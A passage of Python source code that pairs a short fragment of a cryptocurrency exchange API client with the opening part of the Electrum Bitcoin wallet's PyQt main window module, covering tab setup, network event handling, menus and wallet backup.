#---------------------------------------------------------------------- def subscribeTrades(self, symbol): """订阅实时成交数据""" url = "/api2/1/tradeHistory" task = (API_QUERY_URL , url, self.onTrades , symbol) self.taskList.append(task) #---------------------------------------------------------------------- def subscribeOrderbooks(self, symbol): """订阅实时成交数据""" url = "/api2/1/orderBook" task = (API_QUERY_URL , url, self.onDepth , symbol) self.taskList.append(task) #---------------------------------------------------------------------- def onTick(self, data): """实时成交推送""" print(data) #---------------------------------------------------------------------- def onTrades(self, data): """实时成交推送""" print(data) #---------------------------------------------------------------------- def onDepth(self, data): """实时成交推送""" print(data)
main_window.py
#!/usr/bin/env python # # Electrum - lightweight Bitcoin client # Copyright (C) 2012 thomasv@gitorious # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import sys import time import threading import os import traceback import json import shutil import weakref import csv from decimal import Decimal import base64 from functools import partial import queue import asyncio from typing import Optional, TYPE_CHECKING, Sequence, List, Union from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal from PyQt5.QtCore import QTimer from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget, QMenuBar, QFileDialog, QCheckBox, QLabel, QVBoxLayout, QGridLayout, QLineEdit, QHBoxLayout, QPushButton, QScrollArea, QTextEdit, QShortcut, QMainWindow, QCompleter, QInputDialog, QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog, QMenu, QAction, QStackedWidget, QToolButton) import electrum from electrum.gui import messages from electrum import (keystore, ecc, constants, util, bitcoin, commands, paymentrequest, lnutil) from electrum.bitcoin import COIN, is_address from electrum.plugin import run_hook, BasePlugin from electrum.i18n import _ from electrum.util import (format_time, UserCancelled, profiler, bh2u, bfh, InvalidPassword, UserFacingException, get_new_wallet_name, send_exception_to_crash_reporter, InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds, NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs, AddTransactionException, BITCOIN_BIP21_URI_SCHEME) from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice from electrum.transaction import (Transaction, PartialTxInput, PartialTransaction, PartialTxOutput) from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet, sweep_preparations, InternalAddressCorruption, CannotDoubleSpendTx, CannotCPFP) from electrum.version import ELECTRUM_VERSION from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed, UntrustedServerReturnedError, NetworkException) from electrum.exchange_rate import FxThread from electrum.simple_config import SimpleConfig from electrum.logging import Logger from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError from electrum.lnaddr import lndecode, LnDecodeException from .exception_window import Exception_Hook from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit from .qrcodewidget import QRCodeWidget, QRDialog from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit from .transaction_dialog import show_transaction from .fee_slider import FeeSlider, FeeComboBox from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog, WindowModalDialog, ChoicesLayout, HelpLabel, Buttons, OkButton, InfoButton, WWLabel, TaskThread, CancelButton, CloseButton, HelpButton, MessageBoxMixin, EnterButton, import_meta_gui, export_meta_gui, filename_field, address_field, char_width_in_lineedit, webopen, TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT, getOpenFileName, getSaveFileName, BlockingWaitingDialog) from .util import ButtonsTextEdit, ButtonsLineEdit from .installwizard import WIF_HELP_TEXT from .history_list import HistoryList, HistoryModel from .update_checker import UpdateCheck, UpdateCheckThread from .channels_list import ChannelsList from .confirm_tx_dialog import ConfirmTxDialog from .transaction_dialog import PreviewTxDialog from .rbf_dialog import BumpFeeDialog, DSCancelDialog if TYPE_CHECKING: from . import ElectrumGui LN_NUM_PAYMENT_ATTEMPTS = 10 class StatusBarButton(QToolButton): # note: this class has a custom stylesheet applied in stylesheet_patcher.py def __init__(self, icon, tooltip, func): QToolButton.__init__(self) self.setText('') self.setIcon(icon) self.setToolTip(tooltip) self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon) self.setAutoRaise(True) self.setMaximumWidth(25) self.clicked.connect(self.onPress) self.func = func self.setIconSize(QSize(25,25)) self.setCursor(QCursor(Qt.PointingHandCursor)) def onPress(self, checked=False): '''Drops the unwanted PyQt5 "checked" argument''' self.func() def keyPressEvent(self, e): if e.key() in [Qt.Key_Return, Qt.Key_Enter]: self.func() def protected(func): '''Password request wrapper. The password is passed to the function as the 'password' named argument. "None" indicates either an unencrypted wallet, or the user cancelled the password request. An empty input is passed as the empty string.''' def request_password(self, *args, **kwargs): parent = self.top_level_window() password = None while self.wallet.has_keystore_encryption(): password = self.password_dialog(parent=parent) if password is None: # User cancelled password input return try: self.wallet.check_password(password) break except Exception as e: self.show_error(str(e), parent=parent) continue kwargs['password'] = password return func(self, *args, **kwargs) return request_password class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger): payment_request_ok_signal = pyqtSignal() payment_request_error_signal = pyqtSignal() network_signal = pyqtSignal(str, object) #ln_payment_attempt_signal = pyqtSignal(str) alias_received_signal = pyqtSignal() computing_privkeys_signal = pyqtSignal() show_privkeys_signal = pyqtSignal() show_error_signal = pyqtSignal(str) payment_request: Optional[paymentrequest.PaymentRequest] def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet): QMainWindow.__init__(self) self.gui_object = gui_object self.config = config = gui_object.config # type: SimpleConfig self.gui_thread = gui_object.gui_thread assert wallet, "no wallet" self.wallet = wallet if wallet.has_lightning(): self.wallet.config.set_key('show_channels_tab', True) self.setup_exception_hook() self.network = gui_object.daemon.network # type: Network self.fx = gui_object.daemon.fx # type: FxThread self.contacts = wallet.contacts self.tray = gui_object.tray self.app = gui_object.app self.cleaned_up = False self.payment_request = None # type: Optional[paymentrequest.PaymentRequest] self.payto_URI = None self.checking_accounts = False self.qr_window = None self.pluginsdialog = None self.showing_cert_mismatch_error = False self.tl_windows = [] self.pending_invoice = None Logger.__init__(self) self.tx_notification_queue = queue.Queue() self.tx_notification_last_time = 0 self.create_status_bar() self.need_update = threading.Event() self.completions = QStringListModel() coincontrol_sb = self.create_coincontrol_statusbar() self.tabs = tabs = QTabWidget(self) self.send_tab = self.create_send_tab() self.receive_tab = self.create_receive_tab() self.addresses_tab = self.create_addresses_tab() self.utxo_tab = self.create_utxo_tab() self.console_tab = self.create_console_tab() self.contacts_tab = self.create_contacts_tab() self.channels_tab = self.create_channels_tab() tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History')) tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send')) tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive')) def add_optional_tab(tabs, tab, icon, description, name): tab.tab_icon = icon tab.tab_description = description tab.tab_pos = len(tabs) tab.tab_name = name if self.config.get('show_{}_tab'.format(name), False): tabs.addTab(tab, icon, description.replace("&", "")) add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses") add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels") add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo") add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts") add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console") tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding) central_widget = QWidget() vbox = QVBoxLayout(central_widget) vbox.setContentsMargins(0, 0, 0, 0) vbox.addWidget(tabs) vbox.addWidget(coincontrol_sb) self.setCentralWidget(central_widget) if self.config.get("is_maximized"): self.showMaximized() self.setWindowIcon(read_QIcon("electrum.png")) self.init_menubar() wrtabs = weakref.proxy(tabs) QShortcut(QKeySequence("Ctrl+W"), self, self.close) QShortcut(QKeySequence("Ctrl+Q"), self, self.close) QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet) QShortcut(QKeySequence("F5"), self, self.update_wallet) QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count())) for i in range(wrtabs.count()): QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i)) self.payment_request_ok_signal.connect(self.payment_request_ok) self.payment_request_error_signal.connect(self.payment_request_error) self.show_error_signal.connect(self.show_error) self.history_list.setFocus(True) # network callbacks if self.network: self.network_signal.connect(self.on_network_qt) interests = ['wallet_updated', 'network_updated', 'blockchain_updated', 'new_transaction', 'status', 'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes', 'on_history', 'channel', 'channels_updated', 'payment_failed', 'payment_succeeded', 'invoice_status', 'request_status', 'ln_gossip_sync_progress', 'cert_mismatch', 'gossip_db_loaded'] # To avoid leaking references to "self" that prevent the # window from being GC-ed when closed, callbacks should be # methods of this class only, and specifically not be # partials, lambdas or methods of subobjects. Hence... util.register_callback(self.on_network, interests) # set initial message self.console.showMessage(self.network.banner) # update fee slider in case we missed the callback #self.fee_slider.update() self.load_wallet(wallet) gui_object.timer.timeout.connect(self.timer_actions) self.fetch_alias() # If the option hasn't been set yet if config.get('check_updates') is None: choice = self.question(title="Electrum - " + _("Enable update check"), msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " + _("Would you like to be notified when there is a newer version of Electrum available?")) config.set_key('check_updates', bool(choice), save=True) if config.get('check_updates', False): # The references to both the thread and the window need to be stored somewhere # to prevent GC from getting in our way. def on_version_received(v): if UpdateCheck.is_newer(v): self.update_check_button.setText(_("Update to Electrum {} is available").format(v)) self.update_check_button.clicked.connect(lambda: self.show_update_check(v)) self.update_check_button.show() self._update_check_thread = UpdateCheckThread() self._update_check_thread.checked.connect(on_version_received) self._update_check_thread.start() def setup_exception_hook(self): Exception_Hook.maybe_setup(config=self.config, wallet=self.wallet) def run_coroutine_from_thread(self, coro, on_result=None): def task(): try: f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) r = f.result() if on_result: on_result(r) except Exception as e: self.logger.exception("exception in coro scheduled via window.wallet") self.show_error_signal.emit(str(e)) self.wallet.thread.add(task) def on_fx_history(self): self.history_model.refresh('fx_history') self.address_list.update() def on_fx_quotes(self): self.update_status() # Refresh edits with the new rate edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e edit.textEdited.emit(edit.text()) edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e edit.textEdited.emit(edit.text()) # History tab needs updating if it used spot if self.fx.history_used_spot: self.history_model.refresh('fx_quotes') self.address_list.update() def toggle_tab(self, tab): show = not self.config.get('show_{}_tab'.format(tab.tab_name), False) self.config.set_key('show_{}_tab'.format(tab.tab_name), show) item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description) tab.menu_action.setText(item_text) if show: # Find out where to place the tab index = len(self.tabs) for i in range(len(self.tabs)): try: if tab.tab_pos < self.tabs.widget(i).tab_pos: index = i break except AttributeError: pass self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", "")) else: i = self.tabs.indexOf(tab) self.tabs.removeTab(i) def push_top_level_window(self, window): '''Used for e.g. tx dialog box to ensure new dialogs are appropriately parented. This used to be done by explicitly providing the parent window, but that isn't something hardware wallet prompts know.''' self.tl_windows.append(window) def pop_top_level_window(self, window): self.tl_windows.remove(window) def top_level_window(self, test_func=None): '''Do the right thing in the presence of tx dialog windows''' override = self.tl_windows[-1] if self.tl_windows else None if override and test_func and not test_func(override): override = None # only override if ok for test_func return self.top_level_window_recurse(override, test_func) def diagnostic_name(self): #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name()) return self.wallet.diagnostic_name() def is_hidden(self): return self.isMinimized() or self.isHidden() def show_or_hide(self): if self.is_hidden(): self.bring_to_top() else: self.hide() def bring_to_top(self): self.show() self.raise_() def on_error(self, exc_info): e = exc_info[1] if isinstance(e, UserCancelled): pass elif isinstance(e, UserFacingException): self.show_error(str(e)) else: # TODO would be nice if we just sent these to the crash reporter... # anything we don't want to send there, we should explicitly catch # send_exception_to_crash_reporter(e) try: self.logger.error("on_error", exc_info=exc_info) except OSError: pass # see #4418 self.show_error(repr(e)) def on_network(self, event, *args): # Handle in GUI thread self.network_signal.emit(event, args) def on_network_qt(self, event, args=None): # Handle a network message in the GUI thread # note: all windows get events from all wallets! if event == 'wallet_updated': wallet = args[0] if wallet == self.wallet: self.need_update.set() elif event == 'network_updated': self.gui_object.network_updated_signal_obj.network_updated_signal \ .emit(event, args) self.network_signal.emit('status', None) elif event == 'blockchain_updated': # to update number of confirmations in history self.need_update.set() elif event == 'new_transaction': wallet, tx = args if wallet == self.wallet: self.tx_notification_queue.put(tx) elif event == 'on_quotes': self.on_fx_quotes() elif event == 'on_history': self.on_fx_history() elif event == 'gossip_db_loaded': self.channels_list.gossip_db_loaded.emit(*args) elif event == 'channels_updated': wallet = args[0] if wallet == self.wallet: self.channels_list.update_rows.emit(*args) elif event == 'channel': wallet = args[0] if wallet == self.wallet: self.channels_list.update_single_row.emit(*args) self.update_status() elif event == 'request_status': self.on_request_status(*args) elif event == 'invoice_status': self.on_invoice_status(*args) elif event == 'payment_succeeded': wallet = args[0] if wallet == self.wallet: self.on_payment_succeeded(*args) elif event == 'payment_failed': wallet = args[0] if wallet == self.wallet: self.on_payment_failed(*args) elif event == 'status': self.update_status() elif event == 'banner': self.console.showMessage(args[0]) elif event == 'verified': wallet, tx_hash, tx_mined_status = args if wallet == self.wallet: self.history_model.update_tx_mined_status(tx_hash, tx_mined_status) elif event == 'fee': pass elif event == 'fee_histogram': self.history_model.on_fee_histogram() elif event == 'ln_gossip_sync_progress': self.update_lightning_icon() elif event == 'cert_mismatch': self.show_cert_mismatch_error() else: self.logger.info(f"unexpected network event: {event} {args}") def fetch_alias(self): self.alias_info = None alias = self.config.get('alias') if alias: alias = str(alias) def f(): self.alias_info = self.contacts.resolve_openalias(alias) self.alias_received_signal.emit() t = threading.Thread(target=f) t.setDaemon(True) t.start() def close_wallet(self): if self.wallet: self.logger.info(f'close_wallet {self.wallet.storage.path}') self.wallet.thread = None run_hook('close_wallet', self.wallet) @profiler def load_wallet(self, wallet: Abstract_Wallet): wallet.thread = TaskThread(self, self.on_error) self.update_recently_visited(wallet.storage.path) if wallet.has_lightning(): util.trigger_callback('channels_updated', wallet) self.need_update.set() # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized # update menus self.seed_menu.setEnabled(self.wallet.has_seed()) self.update_lock_icon() self.update_buttons_on_seed() self.update_console() self.clear_receive_tab() self.request_list.update() self.channels_list.update() self.tabs.show() self.init_geometry() if self.config.get('hide_gui') and self.gui_object.tray.isVisible(): self.hide() else: self.show() self.watching_only_changed() run_hook('load_wallet', wallet, self) try: wallet.try_detecting_internal_addresses_corruption() except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) def init_geometry(self): winpos = self.wallet.db.get("winpos-qt") try: screen = self.app.desktop().screenGeometry() assert screen.contains(QRect(*winpos)) self.setGeometry(*winpos) except: self.logger.info("using default geometry") self.setGeometry(100, 100, 840, 400) def watching_only_changed(self): name = "Electrum Testnet" if constants.net.TESTNET else "Electrum" title = '%s %s - %s' % (name, ELECTRUM_VERSION, self.wallet.basename()) extra = [self.wallet.db.get('wallet_type', '?')] if self.wallet.is_watching_only(): extra.append(_('watching only')) title += ' [%s]'% ', '.join(extra) self.setWindowTitle(title) self.password_menu.setEnabled(self.wallet.may_have_password()) self.import_privkey_menu.setVisible(self.wallet.can_import_privkey()) self.import_address_menu.setVisible(self.wallet.can_import_address()) self.export_menu.setEnabled(self.wallet.can_export()) def warn_if_watching_only(self): if self.wallet.is_watching_only(): msg = ' '.join([ _("This wallet is watching-only."), _("This means you will not be able to spend Bitcoins with it."), _("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.") ]) self.show_warning(msg, title=_('Watch-only wallet')) def warn_if_testnet(self): if not constants.net.TESTNET: return # user might have opted out already if self.config.get('dont_show_testnet_warning', False): return # only show once per process lifecycle if getattr(self.gui_object, '_warned_testnet', False): return self.gui_object._warned_testnet = True msg = ''.join([ _("You are in testnet mode."), ' ', _("Testnet coins are worthless."), '\n', _("Testnet is separate from the main Bitcoin network. It is used for testing.") ]) cb = QCheckBox(_("Don't show this again.")) cb_checked = False def on_cb(x): nonlocal cb_checked cb_checked = x == Qt.Checked cb.stateChanged.connect(on_cb) self.show_warning(msg, title=_('Testnet'), checkbox=cb) if cb_checked: self.config.set_key('dont_show_testnet_warning', True) def open_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if not filename: return self.gui_object.new_window(filename) def select_backup_dir(self, b): name = self.config.get('backup_dir', '') dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name) if dirname: self.config.set_key('backup_dir', dirname) self.backup_dir_e.setText(dirname) def backup_wallet(self): d = WindowModalDialog(self, _("File Backup")) vbox = QVBoxLayout(d) grid = QGridLayout() backup_help = "" backup_dir = self.config.get('backup_dir') backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help) msg = _('Please select a backup directory') if self.wallet.has_lightning() and self.wallet.lnworker.channels: msg += '\n\n' + ' '.join([ _("Note that lightning channels will be converted to channel backups."), _("You cannot use channel backups to perform lightning payments."), _("Channel backups can only be used to request your channels to be closed.") ]) self.backup_dir_e = QPushButton(backup_dir) self.backup_dir_e.clicked.connect(self.select_backup_dir) grid.addWidget(backup_dir_label, 1, 0) grid.addWidget(self.backup_dir_e, 1, 1) vbox.addLayout(grid) vbox.addWidget(WWLabel(msg)) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return False backup_dir = self.config.get_backup_dir() if backup_dir is None: self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not configured")) return try: new_path = self.wallet.save_backup(backup_dir) except BaseException as reason: self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup")) return msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path) self.show_message(msg, title=_("Wallet backup created")) return True def update_recently_visited(self, filename): recent = self.config.get('recently_open', []) try: sorted(recent) except: recent = [] if filename in recent: recent.remove(filename) recent.insert(0, filename) recent = [path for path in recent if os.path.exists(path)] recent = recent[:5] self.config.set_key('recently_open', recent) self.recently_visited_menu.clear() for i, k in enumerate(sorted(recent)): b = os.path.basename(k) def loader(k): return lambda: self.gui_object.new_window(k) self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1))) self.recently_visited_menu.setEnabled(len(recent)) def get_wallet_folder(self): return os.path.dirname(os.path.abspath(self.wallet.storage.path)) def new_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename = get_new_wallet_name(wallet_folder) full_path = os.path.join(wallet_folder, filename) self.gui_object.start_new_window(full_path, None) def init_menubar(self): menubar = QMenuBar() file_menu = menubar.addMenu(_("&File")) self.recently_visited_menu = file_menu.addMenu(_("&Recently open")) file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open) file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New) file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs) file_menu.addAction(_("Delete"), self.remove_wallet) file_menu.addSeparator() file_menu.addAction(_("&Quit"), self.close) wallet_menu = menubar.addMenu(_("&Wallet")) wallet_menu.addAction(_("&Information"), self.show_wallet_info) wallet_menu.addSeparator() self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog) self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog) self.private_keys_menu = wallet_menu.addMenu(_("&Private keys")) self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog) self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey) self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog) self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses) wallet_menu.addSeparator() addresses_menu = wallet_menu.addMenu(_("&Addresses")) addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config)) labels_menu = wallet_menu.addMenu(_("&Labels")) labels_menu.addAction(_("&Import"), self.do_import_labels) labels_menu.addAction(_("&Export"), self.do_export_labels) history_menu = wallet_menu.addMenu(_("&History")) history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config)) history_menu.addAction(_("&Summary"), self.history_list.show_summary) history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog) history_menu.addAction(_("&Export"), self.history_list.export_history_dialog) contacts_menu = wallet_menu.addMenu(_("Contacts")) contacts_menu.addAction(_("&New"), self.new_contact_dialog) contacts_menu.addAction(_("Import"), lambda: self.import_contacts()) contacts_menu.addAction(_("Export"), lambda: self.export_contacts()) invoices_menu = wallet_menu.addMenu(_("Invoices")) invoices_menu.addAction(_("Import"), lambda: self.import_invoices()) invoices_menu.addAction(_("Export"), lambda: self.export_invoices()) requests_menu = wallet_menu.addMenu(_("Requests")) requests_menu.addAction(_("Import"), lambda: self.import_requests()) requests_menu.addAction(_("Export"), lambda: self.export_requests()) wallet_menu.addSeparator() wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F")) def add_toggle_action(view_menu, tab): is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False) item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab)) view_menu = menubar.addMenu(_("&View")) add_toggle_action(view_menu, self.addresses_tab) add_toggle_action(view_menu, self.utxo_tab) add_toggle_action(view_menu, self.channels_tab) add_toggle_action(view_menu, self.contacts_tab) add_toggle_action(view_menu, self.console_tab) tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction if sys.platform == 'darwin': # "Settings"/"Preferences" are all reserved keywords in macOS. # preferences_action will get picked up based on name (and put into a standardized location, # and given a standard reserved hotkey) # Hence, this menu item will be at a "uniform location re macOS processes" preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences # Add another preferences item, to also have a "uniform location for Electrum between different OSes" tools_menu.addAction(_("Electrum preferences"), self.settings_dialog) tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network)) if self.network and self.network.local_watchtower: tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog) tools_menu.addAction(_("&Plugins"), self.plugins_dialog) tools_menu.addSeparator() tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message) tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message) tools_menu.addSeparator() paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany) raw_transaction_menu = tools_menu.addMenu(_("&Load transaction")) raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file) raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text) raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid) raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode) self.raw_transaction_menu = raw_transaction_menu run_hook('init_menubar_tools', self, tools_menu) help_menu = menubar.addMenu(_("&Help")) help_menu.addAction(_("&About"), self.show_about) help_menu.addAction(_("&Check for updates"), self.show_update_check) help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org")) help_menu.addSeparator() help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents) if not constants.net.TESTNET: help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper) help_menu.addAction(_("&Report Bug"), self.show_report_bug) help_menu.addSeparator() help_menu.addAction(_("&Donate to server"), self.donate_to_server) self.setMenuBar(menubar) def donate_to_server(self): d = self.network.get_donation_address() if d: host = self.network.get_parameters().server.host self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host)) else: self.show_error(_('No donation address for this server')) def show_about(self): QMessageBox.about(self, "Electrum", (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" + _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " + _("You do not need to perform regular backups, because your wallet can be " "recovered from a secret phrase that you can memorize or write on paper.") + " " + _("Startup times are instant because it operates in conjunction with high-performance " "servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" + _("Uses icons from the Icons8 icon pack (icons8.com)."))) def show_bitcoin_paper(self): filename = os.path.join(self.config.path, 'bitcoin.pdf') if not os.path.exists(filename): s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713") if not s: return s = s.split("0100000000000000")[1:-1] out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20] with open(filename, 'wb') as f: f.write(bytes.fromhex(out)) webopen('file:///' + filename) def show_update_check(self, version=None): self.gui_object._update_check = UpdateCheck(latest_version=version) def show_report_bug(self): msg = ' '.join([ _("Please report any bugs as issues on github:<br/>"), f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''', _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."), _("Try to explain not only what the bug is, but how it occurs.") ]) self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True) def notify_transactions(self): if self.tx_notification_queue.qsize() == 0: return if not self.wallet.up_to_date: return # no notifications while syncing now = time.time() rate_limit = 20 # seconds if self.tx_notification_last_time + rate_limit > now: return self.tx_notification_last_time = now self.logger.info("Notifying GUI about new transactions") txns = [] while True: try: txns.append(self.tx_notification_queue.get_nowait()) except queue.Empty: break # Combine the transactions if there are at least three if len(txns) >= 3: total_amount = 0 for tx in txns: tx_wallet_delta = self.wallet.get_wallet_delta(tx) if not tx_wallet_delta.is_relevant: continue total_amount += tx_wallet_delta.delta self.notify(_("{} new transactions: Total amount received in the new transactions {}") .format(len(txns), self.format_amount_and_units(total_amount))) else: for tx in txns: tx_wallet_delta = self.wallet.get_wallet_delta(tx) if not tx_wallet_delta.is_relevant: continue self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta))) def notify(self, message): if self.tray: try: # this requires Qt 5.9 self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000) except TypeError: self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000) def timer_actions(self): self.request_list.refresh_status() # Note this runs in the GUI thread if self.need_update.is_set(): self.need_update.clear() self.update_wallet() elif not self.wallet.up_to_date: # this updates "synchronizing" progress self.update_status() # resolve aliases # FIXME this is a blocking network call that has a timeout of 5 sec self.payto_e.resolve() self.notify_transactions() def format_amount(self, amount_sat, is_diff=False, whitespaces=False) -> str: """Formats amount as string, converting to desired unit. E.g. 500_000 -> '0.005' """ return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces) def format_amount_and_units(self, amount_sat, *, timestamp: int = None) -> str: """Returns string with both bitcoin and fiat amounts, in desired units. E.g. 500_000 -> '0.005 BTC (191.42 EUR)' """ text = self.config.format_amount_and_units(amount_sat) fiat = self.fx.format_amount_and_units(amount_sat, timestamp=timestamp) if self.fx else None if text and fiat: text += f' ({fiat})' return text def format_fiat_and_units(self, amount_sat) -> str: """Returns string of FX fiat amount, in desired units. E.g. 500_000 -> '191.42 EUR' """ return self.fx.format_amount_and_units(amount_sat) if self.fx else '' def format_fee_rate(self, fee_rate): return self.config.format_fee_rate(fee_rate) def get_decimal_point(self): return self.config.get_decimal_point() def base_unit(self): return self.config.get_base_unit() def connect_fields(self, window, btc_e, fiat_e, fee_e): def edit_changed(edit): if edit.follows: return edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) fiat_e.is_last_edited = (edit == fiat_e) amount = edit.get_amount() rate = self.fx.exchange_rate() if self.fx else Decimal('NaN') if rate.is_nan() or amount is None: if edit is fiat_e: btc_e.setText("") if fee_e: fee_e.setText("") else: fiat_e.setText("") else: if edit is fiat_e: btc_e.follows = True btc_e.setAmount(int(amount / 